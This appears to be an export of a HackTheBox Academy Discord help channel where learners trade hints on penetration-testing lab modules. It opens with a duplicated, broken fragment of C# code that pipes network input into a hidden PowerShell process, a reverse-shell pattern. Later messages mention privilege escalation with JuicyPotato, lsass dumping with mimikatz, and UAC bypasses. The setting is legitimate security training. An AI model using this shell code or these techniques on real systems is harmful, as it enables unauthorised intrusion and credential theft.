                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.StartInfo.RedirectStandardInput = true;
                p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
                p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);

               
#
 // Start process and begin reading output
                p.Start();
                p.BeginOutputReadLine();
                p.BeginErrorReadLine();

                // Re-route user-input to STDIN of the PowerShell process
                // If we see the user sent "exit", we can stop
                string userInput = "";
                while (!userInput.Equals("exit"))
                {
                    userInput = streamReader.ReadLine();
                    p.StandardInput.WriteLine(userInput);
                }
        // Wait for PowerShell to exit (based on user-inputted exit), and close the process
        p.WaitForExit();
        client.Close();
    }
    catch (Exception) { }
    // CODE EXECUTION
    }
        // Wait for PowerShell to exit (based on user-inputted exit), and close the process
        p.WaitForExit();
        client.Close();
    }
    catch (Exception) { }
    // CODE EXECUTION
}
solemn vector
#

Hey

topaz talon
#

Hi there !

#

Can someone tell me that, in this server will we learn hacking with kali linux ?

storm elk
#

You can use whichever distro you like

thin citrus
#

I am working on 'Whitebox Attacks - User Enumeration via Response Timing', but cannot manage to work with the time response, I know if the user does not exist than the response time is 27 or 28 milliseconds, but if the user does exist is sometimes 1,027 and sometimes between 200 and 500 milliseconds. So how to enumerate the usernames.

dark hedge
modest stream
#

hey guys i need help. i just completed the footprinting module lab, i completed the hard lab then i went back to the easy lab for practice, just to find out i can not remember the methodology i used to get the flag FeelsBadMan
how can i make this stick sadge_business

waxen totem
#

But practice makes perfect

dark hedge
#

obv dont publish them, keep them as a reference

waxen totem
#

Though my issue is when I lock in I forget to write it down dogekek

#

-# Have half a writeup for Attacking Thick Clients cos of it catscream

slender delta
#

Hi, I have a problem with the Web Service and API attacks module in the skill assessment section:
No matter what I do either there's no password field or I can't get any info relating to the skill assessment db

#

Any help would be appreciated 🙂

fathom pendant
#

Replace the resolvers.txt with a file that contains the target ip

#

No.

#

Resolvers.txt is a list of public dns servers. For, what i hope should be obvious reasons, those public servers can't reach a private target

#

It could also be some other weird error, but that you'd have to raise the issue on the subbrute gh page

#

I mean my only other thing is making sure you're in the same directory as your files

#

¯_(ツ)_/¯

harsh mauve
#

with sshutle, can I not ping internal hosts because it's TCP only?

fathom pendant
#

you can try another type of ping like fping or hping

fathom pendant
#

but if you need to ping internal hosts, just do it from within the machine your tunnel is connected to

signal hound
#

Hi i could really use some help with windows privesc skills assessment part I
Im trying to abuse the privilege i have enabled
I tried juicy potato which gets me recv failed with error 10038.
printspoofer returns operation failed or timed out
Metasploit also returns an error when using getsystem
And Now im stuck

keen ivy
#

Greetings everyone. Just started with HTB academy. Look forward to seeking your guidance. Kindly advise if I can post my questions during the lessons in this channel, or if there's another channel to post questions/clarifications on the modules I go through?

harsh mauve
#

~~ I'm kinda confused. I'm on Web Server Pivoting with Rpivot.|| I followed the steps, had a successful connection, but when I visit the internal ip on port 80 via proxychains it doesnt load. But when I curl it with internal on port 80 (With proxy chains) it comes up with an apache default page and even when I curl from pivot machine, the same content shows. Do I need to enumerate the web app or did I just do it wrong ||. Also when I curl the pivot machine, the exact same page shows ~~ NVM I solved it. Wrong ip lol

midnight orchid
#

hi i am doing planning box

#

but i m stuck

signal hound
signal hound
silent wedge
# silent wedge same issue right now

Still having issue with ssh to the target machine (Linux Privilege Escalation - Skill Assessment)

Read from remote host 10.129.255.177: Connection reset by peer
Connection to 10.129.255.177 closed.
client_loop: send disconnect: Broken pipe

midnight orchid
#

bruh why does no one help just tell to go to another channel

pure seal
foggy snow
#

/cert:ignore not quite sure what the ssh option would be though

signal hound
#

Can someone please explain to me what is a CLSID in juicy potato
They didnt teach that in the module

golden gate
#

Hello
in the Introduction to Windows Command Line
in the last part
skill assessment
i'm asked as follows
but i dont have user3 password i only have the password of user0 and user1
am i supposed to enumrate user0 and user1 for the passowrd of user2 or what

gray yacht
gray yacht
tiny frigate
#

Looks like I'm not the only one getting kicked out of SSH because of "Broken pipe" today?

#

Trying to switch regions now as suggested before...though I've already been through the region switching a few days ago because it wouldn't let me go into Full Screen mode on PwnBox otherwise, will see if that works now I suppose 🤷

fathom pendant
midnight orchid
#

ok

fathom pendant
tiny frigate
fathom pendant
#

The pwnbox utilizes the same vpn pack, you may need to restart the pwnbox when you change vpn regions

restive vortex
#

information gathering - web edition | web archives- there is no archive for this timestamp on the waybackmachine. im not sure what to do.

low seal
#

There is, are you sure that you are searching the correct domain?

restive vortex
#

because the older one worked for the question prior and i dont think it was registered from godaddy during 2017

#

nvm i found it- I still have no clue why it didnt work though because i just closed everything and re-searched/

golden gate
clear seal
#

Nothing like doing a ping scan of a class B network… (assuming I’m not down a rabbit hole)

noble cobalt
#

Hey I’m new here who can teaching me penetration testing

compact patrolBOT
clear seal
storm elk
#

Not all modules are to be paid for

tame basalt
clear seal
#

┌──(user42㉿Kali)-[~]
└─$ for i in {1..254};do (ping -c 1 172.16.5.$i | grep "bytes from" &); done

64 bytes from 172.16.5.15: icmp_seq=1 ttl=64 time=175 ms
alright guys i'm not crazy something is up. there is no other host that is up lol

#

this is the tunneling and pivoting skills assessment. anyone got any input? there is literally no other live IP (and this is the webserver in the start of it) I did a full ping sweep of the class B network it's on. I think something might be broken

tame basalt
#

Sorry haven't done that one yet, thought of another similar one

#

Have you by any chance used xfreerdp from a pwnbox? 😛

#

Found the problem, having my VPN running while was the problem

clear seal
#

I have yes, but most of the time I use my own machine.

severe wedge
#

Yo

golden gate
#

ig something is off hereblaze

clear seal
#

So, about my module issue... lol

#

anyone have any ideas?

#

before I pull out the 2 of the 3 remaining hairs I have left on the top of my head?

storm elk
#

Just to be sure, did you wait a few minutes before you tried doing the ping sweep?

clear seal
#

yes, I didin't even get to the point until after I found the creds to get into it....

#

maybe I'll just kill the box and start over and see if that helps

#

sigh lol

clear seal
#

yes

storm elk
steady pelican
#

Hello
I am working on Active Directory LDAP enum skills lab.
I am stuck on last final question, what non-default privilege does the htb-student usr have?
I have tried finding interesting ACL related to it and used whoami / priv still no success. Any nudge?

gray yacht
steady pelican
gray yacht
steady pelican
#

Done

#

Solved the entire LDAP module

pearl ledge
#

i want to know about the payload structure

rustic sage
#

Hi guys :] Just wanted to know if someone has actually been able to navigate the entire htb courses (talking about some actual ones like maybe pentester etc) WITHOUT subscription and just using cubes ? :/

#

I have a bootable pendrive for parrot os so maybe no need of the cloud based VMs they have maybe...just wanted to know if it is possible?

gray yacht
pearl ledge
#

so it is other than this payload right?

gray yacht
pearl ledge
#

roger that

pearl ledge
gray yacht
pearl ledge
#

yes

gray yacht
#

I suggest reading through Loading a Remote Script again.

pearl ledge
#

ok

rustic sage
#

On password attacks in the attacking LSASS section, I have gotten the lssass dump file, but using pypykatz on it triggers an error:

INFO:pypykatz:Parsing file lsass.dmp
ERROR:root:PEB parsing error!
```, I am using the latest version of pypykatz. Any help ?
fathom pendant
#

parsing error is likely that the file got corrupted in transit

#

in powershell Get-Filehash <filename> -Method md5 should give the md5 checksum of the lsass file
in terminal when you transfer md5sum <filename> to check

#

if they match -- no issues
no match -- corruption, try a diff transfer method

rustic sage
#

got it, will try now

#

thanks for the help!

fathom pendant
#

it's -Algorithm not -Method

rustic sage
#

yeah it's corrupted

#

finally got it working, thanks for the help marcie

glacial bay
#

Does HTB have moduels on using Havoc?

gray yacht
limber fog
#

Hey the Password module had some section added to it, and for the new Hashcat section, we are supposed to crack some hashes, which are they ?

cold star
#

I was doing Pth from windows and boom everything changed kek kek

limber fog
#

Like we have this

#

But no additionnal resource, so what are the hashes we are supposed to crack ?

cold star
#

They have also removed 2 assesments

limber fog
cloud urchin
#

Check the resources section, go through the sections again and you can probably find your answer

cold star
#

If you need any help in it you can contact me

cold star
#

The assesment now only has 1 question

gray yacht
limber fog
#

Alright thanks

crimson leaf
#

100% -> 84% Sad_Squidward_Pepe

sage void
#

What modules did they update

#

I was in the middle of password attacks and just noticed a bunch of new commands in the cheat sheet lol

#

Nvm it looks like it was just password attacks

crimson leaf
#

Ah too slow lol

sage void
#

Thanks

#

Appreciate it

languid marlin
#

What are the best red team hacking modules in academy as a beginner? I just finished getting started.

#

Is there not s good path or journey i could follow that will make me a good hacker

safe mango
#

As a beginner where you start does not matter as much as you might think

jolly oasis
#

I'm feeling pretty helpless here. I'm working on the Using Web Proxies > Encoding/Decoding module. We get the zip file and we're supposed to decode several times for the flag. I like to use CyberChef for stuff like this. I've tried so many different configurations (taking the hint into account) and can't seem to get it to decode into anything remotely resembling a flag.

fathom pendant
#

use burpsuite's decoding

jolly oasis
# fathom pendant use burpsuite's decoding

That presents another question: the zip file is presented in our browser, how do I get that file contents into the browser based Linux box? I can't seem to paste into the box.

fathom pendant
#

there should be a clipboard icon on the pwnbox

jolly oasis
fathom pendant
#

also i was able to get it with cyberchef pretty easy

#

once you get down to %xx%xx... that's the url

jolly oasis
#

So strange. We're DEcoding right?

#

No matter what I try, I don't end up with something that looks URL encoded. It all keeps ending with a = (which leads me to belive it's still base64 encoded)

#

Wait! I think I got it! I don't want to share any spoilers so I'll just shut up now. Thanks again.

clear seal
#

Welp, shit keeps disconnecting for me, so I’ll finish tunneling and pivoting tomorrow!

rugged flax
#

Hi, I'm working through the information security foundations module but a bunch of the sections are tutorials on how to install a VM, make a pentesting platform, etc (like this https://academy.hackthebox.com/module/87/section/883)

Do I need to install all this stuff and set up everything it tells me to for the rest of the module and the pentesting path? Or are these optional and just good practice?

waxen totem
#

And specific tools in each

rugged flax
#

Got it yeah I set up a VM on virtualbox with parrotOS

fathom pendant
#

it may not be clear but the examples in the section appears to be the hashes

#

yep it's the examples from the section

gaunt forge
#

loved it tho

fathom pendant
#

the only hash not directly in the reading is only in the example; but they all take < 30s to crack

vague walrus
#

I have a problem......in HTB's network enumeration with nmap module, the flag for the 'nmap scripting engine' section doesn't seem to be working. And i'm pretty sure I found the right flag, cause it was in the usual HTB{***} format. the flag was found on port 31337, and i retried several times (with a new VPN, new IP)

young gale
#

Depending on how you tackle this exercise, you might have to deal with UAC. If that is the case, one easy solution can be found by looking up the "msconfig UAC bypass".

having issues, with knowing how to bypass the UAC

summer terrace
#

I need some help.

Module: Login Brute Forcing
Task: Skill Assessment 2
Context: I was able to SSH to the target server, and used username-anarchy to generate a list of potential usernames based on some information I found in IncidentReport.txt. I even reread the corresponding section Web Services multiple times, but everytime I attempt to find the ftp user I get an error stating unable to connect.
Command used: medusa -h <IP address> -U usernames.txt -P passwords.txt -M ftp -t 5

young gale
fathom pendant
#

i haven't done that module

young gale
#

Ah i see

fathom pendant
vague walrus
#

@fathom pendant so its giving out a wrong flag value? cause i got the flag after running the default script.

tiny frigate
#

I dunno, something is off today in Academy. earlier I had those persistent "bad pipe" errors when trying to connect to a target via ssh, now that that finally works, the target cannot resolve the host address for a file I'm supposed to download, when I use the IP directly, the connection times out...all problems on the target only.
Anyone else still struggling with technical glitches? I might just call it a day and try again tomorrow, what I'm currently doing should not be the hard part of the exercise 🙈

waxen totem
tiny frigate
waxen totem
tiny frigate
#

(I mean, makes sense, too? I dunno what I was thinking there)

fathom pendant
#

but the section focuses more on a specific port, start there

rugged flax
#

I'm kinda just starting htb but some sections just seem kinda random

#

but I'm not tryna set up my own VPS right now

#

so am I expected to do anything with this information?

#

I took notes and that's it

dense pawn
#

are you doing a path

rugged flax
#

yeah intro to information security

#

(before starting pentesting)

dense pawn
#

if its not relevant to you then skip it

rugged flax
#

alr thanks

cloud urchin
#

You don't have to do any of that. I jumped right into the CPTS path with my own VM.

#

It can be useful information for people who don't know, though.

rugged flax
#

alr cool because I've set up a VM on my computer and that's it but there's a bunch of other sections on setting other stuff up

#

thanks

cloud urchin
#

Yeah you really just need one way of doing it, and if you don't have any you can use the pwnbox.

rugged flax
#

ah okay got it

strong maple
#

Test

cloud urchin
vague walrus
fathom pendant
fathom pendant
vague walrus
past nymph
#

In module Advanced Deserialization Attacks, section Example3: Binary, why do the payloads I find on the Internet are written sortedSet in the downstream form but here is the reverse? And when I write down, the error report does not have filename

waxen totem
#

Anyone familiar with how echo and the -n flag works? Just wanting to clarify something cos of different hashes I get for the new Introduction to Password Cracking section

#

-# nevermind I'm an idiot 😄

bitter umbra
wooden seal
#

linux priv esc targets are bit slower than usual targets (is it just for me?) using us acad2 vpn

waxen totem
#

Works pretty fine for me

rocky estuary
#

are the questions in the password attack module has been changed ? because i'm doing the module again and cracking the hash in the "Writing Custom Wordlists and Rules" section gave me different answer

thin citrus
storm elk
thin citrus
#

I got it now

fathom niche
#

Hi,
I have a technical problem at "Introduction to Malware Analysis" --> Dynamic Analysis
How can I fix this?

high gyro
#

Module - Captive Portal - MAC Spoofing Secrtion. After Spoofing the MAC Address the lab machine cannot connect anymore to the WLAN. What i did

  • Connect to Lab machine and then connect to guest WIFI
  • Lookup MAC Adresses connected to hotspot with airmon-ng and wlan1 ifc
  • Lookup IPs for MAC Adresses
  • take wlan0 ifc down
  • spoof MAC Address for wlan0
  • wlan0 ifc up
  • change ip address

Then i cannot connect anymore to the Guest WIFI. Same happens with the automated script. Any help?

fathom pendant
rocky estuary
patent totem
#

Hello
I'm working on web attacks - Advanced File Disclosure and I've been trying to use the error based method but the flag isn't showing I'm not sure if I'm requesting the right page
the machine is accessing my python server so the only issue I can think of is the flags dir

#

can anyone help?

rocky estuary
#

anyone having issues installing dislocker ?

fathom niche
austere hound
eager ledge
# signal hound Can someone please explain to me what is a CLSID in juicy potato They didnt tea...

Yes. I also felt a little lost when trying to use JuicyPotato. Just the content taught on the section alone is not enough.

By default, the CLSID used is that of BITS. You can find list of CLSIDs here: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

You have to try multiple CLSIDs and check which one creates the required process.

On one of the blogs that I read, following CLSIDs are reliable to escalate privileges to SYSTEM.

GitHub

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. - ohpe/juicy-potato

jade agate
#

Can anyone tell me the answer of the final quesion in the assessment of Network Foundations

uneven obsidian
#

i just found out that they've added a few sections to the Password Attacks module, i am facing issue attempting to bypass the UAC in "Attacking Windows Credential Manager" section within the "passwrod attacks" module.

What is the password mcharles uses for OneDrive?

uneven obsidian
#

yes I tried to run the msconfig and to investigate how i can use it to bypass but when I attempted to run msconfig it required admin's creds ^^

#

i am missing something

waxen totem
#

Did you try running it as the other user?

uneven obsidian
#

i tried using the runas to open msconfig with mcharles but i failed ^_^

waxen totem
#

did you runas cmd -> msconfig or just runas msconfig?

uneven obsidian
#

okay apparently i tried to execute it from the second user twice

#

my bad ^^ thanks

wary wren
#

can anyone help me in this As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

past nymph
shell stag
#

Hello friends, I need to think out loud about which direction to go on the command injection skills assessment (this one caught me off guard - all the injections through the module were via POST requests and then the assessment has a GET request) each of the functions has an associated function, but some of them will throw a very visible verbose error when you try to do something illegal or malicious. If something throws an error, I should be able to use an OR operator to direct the system to my obfuscated command. Thumbs up or flames if I'm on to something.

waxen totem
#

You oughta transfer mimikatz

#

and yes there are other ways to get the password, mostly using tools mentioned in the module

upbeat iron
#

Regarding the Penetration Testing Process Module Penetration Testing Overview section the following statement doesn't make much sense to me:

In principle, employees are not informed about the upcoming penetration tests. However, managers may decide to inform their employees about the tests. This is because employees have a right to know when they have no expectation of privacy.

My understanding is employees have no expectation of privacy with information provided to an employer for legitimate business purposes nor do they have an expectation of privacy when interacting with employer infrastructure. Is this not correct?

waxen totem
upbeat iron
#

Weird thing to say of course they can be legally informed, the company contracting the pentest is the client and the client has this discretion. But ok. Just felt so obvious I was sure I had to be missing something

#

I guess my bigger concern was about the statement they have a right to know now that I think about it

waxen totem
upbeat iron
#

i.e. they already know they have no expectation of privacy, so it doesn't follow that an additional duty to inform exists.

waxen totem
upbeat iron
#

ahh, I see in the case of an internal company privacy which might mandate disclosure to employees

#

interesting, alright thank you @waxen totem

waxen totem
#

All in all it depends on the contracts already in place and the contracts to be set in place

merry stone
#

Hi I am doing Password Attacks Introduction to Hashcat
im trying to crack the first hash, which is '$1$FNr44XZC$wQxY6HHLrgrGX0e1195k.1', I used this command
hashcat -a 0 -m 500 '$1$FNr44XZC$wQxY6HHLrgrGX0e1195k.1' rockyou.txt
it gave me ||forever21|| but it's incorrect answer

waxen totem
#

that's the 0th hash...(?)

merry stone
merry stone
waxen totem
forest zenith
#

can someone who has done the module Attacking Common Applications dm me

storm elk
#

Which section do you wanna ask about?

#

I have done a few sections

forest zenith
#

now Im stuck on Miscellaneous Applications

#

can I dm you?

storm elk
#

havent done them yet, but sure

clear seal
#

What it does everyone.

fathom niche
#

"Introduction to Malware Analysis" -->Code Analysis How can I transfer data (resources) from Webportal HTB to the PWNBox?

feral temple
#

@forest zenith

#

I know someone who's good at it

quiet gust
#

Also, did anyone solve this new question? I'm stuck in this.

clever edge
#

Hi guys, I have a problem with the academy module for the cpts. In particular, with the Privileged Access in Acrtive Directory Enumeration & Attacs. The problem is with the question "What host can this user access via WinRM? (just the computer name) ?" I tried with all the hosts in the ad and resetted multiple times the machine. I answered the all the questions except of this. Any help pls? I'm currently stuck
Obviously I used the powerview command and the bloodhound raw cypher without success

rustic sage
#

Hi

drifting copper
#

hey guys i was at system info but their ques they didnt even taught much

#

but have given much higher level ques

boreal folio
#

hello

cold star
limber fog
quiet gust
fathom pendant
#

look for files on the shares

limber fog
proven crane
#

just completed the new Attacking Windows Credential Manager section

quiet gust
proven crane
#

is it just me or does it not provide nearly enough info to succeed without external resources

fathom pendant
#

module got updated so the answers filled in won't match the expected answer

fathom pendant
proven crane
#

to complete it using the methods provided you need to do a UAC bypass, which seems out of scope for password attacks

#

and the easier ways to do it arent mentioned at all, which seems silly

fathom pendant
#

what section?

proven crane
#

Attacking Windows Credential Manager

#

Password Attacks module

fathom pendant
#

i don't see where UAC bypass is needed

proven crane
#

for the mimikatz example provided you need admin

#

I found a way to do it in mimikatz that didn't require it and i think it's strange the module didnt mention it

fathom pendant
#

lab is taking forever to spawn for me; when i get around to recompleting this module i'll update you

fathom pendant
#

there's a few tools mentioned

#

like lazagne; literally ran it without needing to go through UAC bypass methods

crude halo
#

Running both LaZagne and mimikatz both come back with empty password results, anything im missing?

jaunty anvil
#

@fathom pendant is hack the box certificate free?

fathom pendant
#

No

fathom pendant
visual estuary
#

Attacking Windows Credential Manager

I am having trouble with this new page/module added. This is my last question to complete the CPTS path.

Yes I have checked the hint. The UAC is how I was able to get mimikatz to run. I swapped the registery of eventviewer with mimikatz and that is how it was able to run. Now I have plaintext admin pass for mcharles.

Just not getting the onedrive cred. I am able to use the admin access from the mcharles user. I just can't get the onedrive password.

Question:"What is the password mcharles uses for OneDrive?"

crude halo
carmine wadi
#

Hello, I would like to know if it is possible to have information on a license plate?

foggy monolith
#

Relay to SMS_admin appears to work, but doesn't. Why? Anyone? @fathom pendant ?

nova pivot
#

The second question for the Credential Hunting in Network Shares section of the new Password Attacks module is a pain 👀
has anyone been able to complete it ?

crude halo
fathom pendant
nova pivot
proven crane
proven crane
#

Did you need to impersonate the user first?

#

The password required for the module is not saved in the vault of the user you’re given creds for, right?

crude halo
#

mcharles cred vault wouldnt show up with vault::cred if i was the inital account

proven crane
#

Just checking my understanding here

molten light
#

hi people i am new here i want to start

vernal tapir
visual estuary
fathom pendant
#

C:/temp

storm elk
visual estuary
near nova
#

hey

wet parcel
#

I am new here

storm elk
nova pivot
#

For those trying for the second question of the Credential Hunting in Network Shares section of the new Password Attacks module, enumeration is an iterative process 😉

#

Also, the question is misleading

#

But yeah, iterative process 😄

foggy monolith
#

Another 'duh' moment: forgot the 'DOMAIN\' — it sometimes is really that simple.

vernal tapir
#

What is the usual cause if my Windows 7 target host crashes when attempting a binary exploit? (Entire target crashed, had to reset unfortunately)

stuck hollow
#

hey people, im stuck in Writing Custom Wordlists and Rules with Hashcat, need help please. Anyone?

sage void
#

For the cracking protected archive’s part of password attacks what exactly is the sudo dislocker /dev/loop0p2 -u1234qwer - - /media/bitlocker

#

What does that do

grand plover
#

Hallo guys

grand plover
grand plover
keen pewter
#

what windows service is related to pdf editing 🤔

grand plover
#

GUI base pdf editor

#

Yea

grand plover
clear seal
#

The tunneling and pivoting skill assessment has been the most fun one yet. (In my opinion, going in the order of the pen tester track).

spiral crow
#

A bit of a newbie but stuck on inlanefreight unique paths cURL question — I get 13, but it says it’s wrong. What might I be missing? Or is there anywhere I can't get a hint on here?

grand plover
fathom pendant
spiral crow
#

Thanks Marcie Lee

#

I think I was potentially missing the uniquely sort them bit 🙂

fathom pendant
#

yep an essential part of answering the questions is being able to break down what it's asking you to do specifically

sage void
#

Lol

#

When I run this command it says unable to grab vmk or fvek and none of the provided decryption mean is decrypting the keys

tiny barn
fresh oracle
#

Hello iam new here can you help me out BTW I've read the rules and get verified but how to use this app ?

fresh oracle
#

Please anyone ?

fathom pendant
#

you haven't been verified as your role/name hasn't been updated to be linked to your htb account

quiet gust
nova pivot
zealous blaze
#

hi

#

i am doing a ctf and need help is this the right place to ask?

stuck hollow
#

dictionaries from Mark White data

#

steps solutions doesnt help at all and hint eather

tacit ore
#

i was typing my question but decided to check it once more.. again.. AND i solved it myself! very small achievement but its something 😉

hollow tapir
#

I just went over the Attacking Common Applications module and had a question regarding multimaster.dll. How would we know in an engagement to start analyzing that specific dll? Is there a list of DLLs which typically have hardcoded creds or connection strings? The same goes for linux. How would we know what and when to start reversing? Thank you for your time

nova pivot
stuck hollow
#

if you can help would be awesome

nova pivot
flint palm
#

guys mimikatz is giving me such a mistake ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) what is that?

quiet gust
#

In Pass the Certificate of Password Attack module, can't get to admin.
There's no port 80 open. How can I abuse AD CS NTLM Relay Attack (ESC8) then?
Any idea?

vocal musk
#

is there a channel to discuss specific machines? Those in the "Dedicated Labs" section of the enterprise HTB account? (e.g. "Isotope" machine)

fathom pendant
vocal musk
quiet gust
fathom pendant
flint palm
flint palm
#

ok

nova pivot
# stuck hollow can you dm me later?

I can't check if I'm right, because I can't check for the answer as it's already completed, but feel free to dm me so we can see what you've already done

nova pivot
flint palm
nova pivot
#

One is mentioned in the hint, the other you already know I gather

quiet gust
crude halo
nova pivot
hollow tapir
#

I just went over the Attacking Common Applications module and had a question regarding multimaster.dll. How would we know in an engagement to start analyzing that specific dll? Is there a list of DLLs which typically have hardcoded creds or connection strings? The same goes for linux. How would we know what and when to start reversing? Thank you for your time

crude halo
#

Anyone have any ideas for the credential harvesting network shares? everything seems to just not work, take to long, or spew out millions of things.

foggy monolith
#

What DOMAIN\ do I log into with the credentials given for the MSSQL, Exchange, and SCCM Attacks skills assessment? Tried clientname.local, associated-client-name.local, misspelling.local and nothing seems to work. @cunning frigate any ideas?

primal rover
#

Hey HTB peeps I need some help. I'm working on the LFI assessment. I was able to fingerprint the web server, but i can't get anything except "invalid input" not even wrappers seem to work any hints are appeciated

foggy monolith
#

Hello? Anyone?

fathom pendant
foggy monolith
fathom pendant
#

... typo

#

Inlanefreight <- company 😉

quiet gust
hollow tapir
foggy monolith
fathom pendant
hollow tapir
#

valid

#

Can I post outside of modules?

#

It was a machine awhile back

fathom pendant
#

Also i would like people to stop @ me randomly if I haven't engaged already in the conversation

foggy monolith
#

Never mind, got it. Was a weird typo to say the least.

fathom pendant
quiet gust
flint palm
foggy monolith
quiet gust
primal rover
#

Anyone able to help with LFI assessment? Been trying everything i can think of and i'm stuck. 2 days in

primal rover
#

File Inclusion: Skills Assessment

clear sleet
#

I need help

primal rover
# quiet gust which module

I was able to get "invalid input" as a warning, but ecoding the request doesn't seem to work to bypass LFI protections

primal rover
primal rover
crude halo
#

anyone have tips for the network shares credential harvesting? everything is giving to many results even when directing certain network shares.

quiet gust
nova pivot
#

As for the second, enumeration is iterative

flint palm
#

guys who have completed password attacks credentials hunting in network traffic in what format one has to submit credit card number?

flint palm
#

yes but it says wrong answer

nova pivot
#

Also, what kind of protocol would that type of request be ?

primal rover
nova pivot
flint palm
#

yes I have the number already and I found it easily but switching to regular expression

#

but I am submitting and it tells me incorrect number

#

I turned wireshark to regular expression mode and it works much more easily then using string and protocols and request and so on

#

answered all the questions immidiately

nova pivot
#

That's weird, I didn't have any issue with the CC number

flint palm
#

can i dm you?

rustic sage
#

Hi I am new here. Can’t talk in general thread. Totally new to a lot of hacking and computer such. Advice and guidance would be appreciated. Thank you

surreal rain
#

Random question. Anyone tried doing academy from a tablet?

reef holly
#

Hello, I stuck on "Public Exploits" module: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
I got:
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
23/tcp filtered telnet
111/tcp open rpcbind 2-4 (RPC #100000)
256/tcp filtered fw1-secureremote
5900/tcp filtered vnc
From these only ssh and rcpbind seemed doable (at least at my level).
SSH: 1) I explored ssh auxiliary/scanner/ssh/libssh_auth_bypass and that came back empty. 2) Also tried sudo nmap -sV --script ssh-auth-methods -p22 $IP, Supported authentication methods: publickey (nothing other than publickey) so I assume password bruteforcing is not the answer here... Then I ran out of ideas for SSH.
RPCBIND: 1) rpcinfo -p $IP returned only portmapper - there are no other RPC services (like NFS, NIS, Mountd, etc.) registered with it. 2) The only exploits related to rpcbind 2-4 are DoS type vulnerabilities... not a viable path to gain initial access (RCE or shell) to the target server.
Any suggestions?

fathom pendant
severe inlet
fathom pendant
severe inlet
fathom pendant
#

Public Exploit section of Getting Started

#

I've been around long enough to know the context

severe inlet
#

Holy moly i wouldve never known that lol props to you

fathom pendant
#

I don't leave my house enough to learn different

formal oriole
reef holly
fathom pendant
reef holly
fathom pendant
#

netcat may not necessarily be the answer either

#

i'd first check and see if it's a web server first 😉

reef holly
#

muahhh - only in the real world they don't give you the port #
52692/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site

reef holly
slender pendant
#

Hey